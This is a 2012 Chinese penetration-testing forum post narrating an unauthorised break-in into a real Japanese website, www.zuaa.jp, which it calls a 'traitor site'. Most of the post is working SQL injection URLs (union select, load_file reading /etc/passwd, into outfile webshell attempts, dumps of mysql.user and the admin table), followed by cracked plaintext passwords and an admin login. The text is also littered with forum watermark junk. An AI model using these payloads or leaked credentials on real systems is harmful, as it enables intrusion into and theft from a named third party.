中国网络渗透测试联盟

标题: 原创 检测汉奸站全过程 [打印本页]

作者: xiancda    时间: 2012-9-17 16:22
标题: 原创 检测汉奸站全过程
补:www.zuaa.jp测试

: K) Z" e1 J, E3 ]& F; w/ N+ ^& |+ B1 x
0x01. 检测 www.zuaa.jp 收集数据6 D: J6 C9 q5 i$ n, X
[attach]73[/attach]3 s% C6 I& o1 u% T1 k

8 n/ f& h# z# twhatweb
+ |2 x% S0 x5 }' e3 ^5 n[attach]74[/attach]
: L) F; \. B8 f/ n% `/ k  [; f9 }# |/ G& k$ D3 t, X' a
利用NMAP扫描
; Q( d7 i7 e  _0 a5 y  x[attach]75[/attach]
' ?: x# F4 C% J% }8 x% Z8 T中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- _, k1 I2 W4 I* v5 u
0x02.找注入点
3 K, v; y( l6 n" @: V/ J& Y7 X找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3904 u% m7 `4 @! D
[attach]76[/attach]
, s8 d/ y5 O- z/ B: e6 k0 ~) X. ?! B7 g7 |8 t* t8 @3 ?7 C
0x03.order by7 a/ c8 ~0 a; J! c( b
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
3 K* V( Y8 a; x8 c* {& S; D[attach]77[/attach]
8 S& h5 B2 n$ d$ L/ P- `3 |: qorder by 28报错,order by 27正常# \7 u7 [) ~  i( ?# B9 |
) x, q6 g8 F4 V  D9 z8 ~. _# _
0x04.   union手动查询7 O  R1 u1 c$ p$ ^2 J) P
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
$ v. H* Q; _6 X$ C( c) i# `; K添加到 27 时正常显示 / C5 M0 I  W! T! l; h7 d! Q
[attach]78[/attach]
. N2 w7 I! @$ f! O- a5 t中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
6 E6 e* a* p: R  l4 E7 c
. a( V) |/ C% Q$ C9 {0x05. info:, z1 K2 S; {' L% E( v0 s& v
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
: S' }# k) G, n2 x[attach]79[/attach]# f# w: W, `( y5 O  p- I
user:            root@localhost
* I! c1 p, J0 ~database:    openpne4 e% Z+ f- K( q" x, w+ W
version:      4.1.22
+ F# o$ ~. ]) [os:             portbld-freebsd5.4
. t; v6 [' B; n
/ V5 q0 d, K8 c! s8 z0x06. root用户0 n+ b; Q( q5 w( g7 y  Q
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)3 E  c) y  v) K3 O1 o
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ! f1 Z$ x, r0 l/ C1 p! J. H
[attach]80[/attach]
/ F6 Q2 ]3 t/ r8 F. X, y4 x通过工具转换
8 M- B% E" t# L" V) Z* b0 H3 u[attach]81[/attach]. U: a& r& W# v" F: ]* \* T" R1 v. o, [
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& N- V5 v8 g( ^2 u/ j$ O- X7 j
$ C0 r" m; K2 X% Y6 I2 a# B
0x07. 利用 into outfile, N4 G3 j4 k& @3 Q
全部都失败1 k( }* |0 p# A
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php! o* Y% C. w9 k) U% z  v' D
7 U& Z9 }7 k$ d- c
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php + E: K# I+ C7 ]( l5 [
1 e# z4 S( `3 w1 R+ H. H1 g( @
页面显示“MDB2 Error:syntax error”
2 l7 w; ]9 |# H$ ?  V
. s9 k; o8 ]& C( _5 d! d0x08. 利用 mysql 4.1
& ]; S) D$ I9 V# q猜常规表名,字段未果 工具 sqlmap
- B/ d0 T9 @& G% Z0 z; k) `中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
6 v7 l0 W% y4 P1 `% N0 m$ ^, X% ^' J5 W& e8 |  d
[attach]82[/attach]
- B! s* C7 X( S3 x4 T/ _6 x8 Y# P" R$ s7 o2 d$ M1 g5 ?
0x09. 查找后台
5 y8 h/ M3 `) x2 H+ G利用 现有的各种 后台工具尝试都不行
6 p! _2 S" P) [- b4 l" E
4 s% {+ z- r; m: K% c3 y0x10.  MySL外联方法
' ]: Y  g. B: U% R从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
( s# }0 V6 l3 R: w7 D$ }- I2 ~可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user& j! U( p, w* j+ @/ J+ u) Q3 ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user5 @$ w: w! b- r" f) t0 h
[attach]83[/attach]
2 P. T* O0 M# x+ Z这个可以在 www.cmd5.com 解密
2 x6 K0 X& c# o$ i3 s1 P9 ]9 Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
6 x' e4 O: q  [0 h; _chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
/ L  b& W1 I; \openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???! W0 \$ O/ t$ n1 B& [8 p% K
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
  T! V% C) [+ p/ @. U工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知! A0 I) m8 r0 F: M; a
[attach]84[/attach]& s5 ~0 k- U0 E/ _0 n
$ u  D- n3 g! I% d7 N6 E
0x11. 网站突破! d8 `) J( H$ y+ f+ l; b# s  ~
发现网站的源程序 openpne, google 下载 openpne 源码9 U3 s6 ^& f6 I  r4 G
[attach]85[/attach]
7 m) W% A  X1 |* ^3 W% @  @1 r  t# x) }
0x12. 默认信息利用
: z* P9 J: v# e+ V+ |4 o6 w3 nhttp://sns.zuaa.jp/?m=admin&a=page_login
; f1 d5 E( U; Z9 w[attach]86[/attach]
9 O$ ^7 S4 ~$ }0 F7 o表名 (c_admin_user) ,字段名(username,password)  S  K( f$ y. E* J) J
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
. B% n" N  o/ F- I' i# @# r& c[attach]87[/attach]! p; y' @  L2 O* q! j3 }7 [
解密
! c8 o1 g  X" v5 `% W* P2 T& U6 E7 u; qzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009: p1 N" [& x6 X/ i; D
zuaajp:c0923ec5857796a393da99905008c176,          zju1897: i  [! j/ q4 r

  I! c3 [' ~# k5 \* u7 }8 ?4 t0 K2 K中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持6 S5 G% Q( V% C9 B
4 U1 N" N( G( z* X6 Y( X
0x13. 登录后台
/ H+ g& N" b. ~: f[attach]88[/attach]
  N) K& }$ `8 n. h# D5 t
5 d" Q" ?8 n2 q/ j2 F" ~7 f
  l5 h. m- \- \* R9 X0x14. 小结( k4 C3 D. A; J; U/ @
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
5 ?# G- M' a! F( |! ]1 \( J4 z感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点: P. I* j+ }6 ]) Q, }$ _) T" r, \
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
! K' C. y# n/ Y3 x: B中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持4 P8 o5 }! I$ G$ [
8 P1 S& ]$ I5 G( x9 r" A  B
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
; l6 L0 g6 X# H. R
作者: 荒村狂客    时间: 2012-9-19 08:27
哪个牛人 费的这劲 入侵的




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2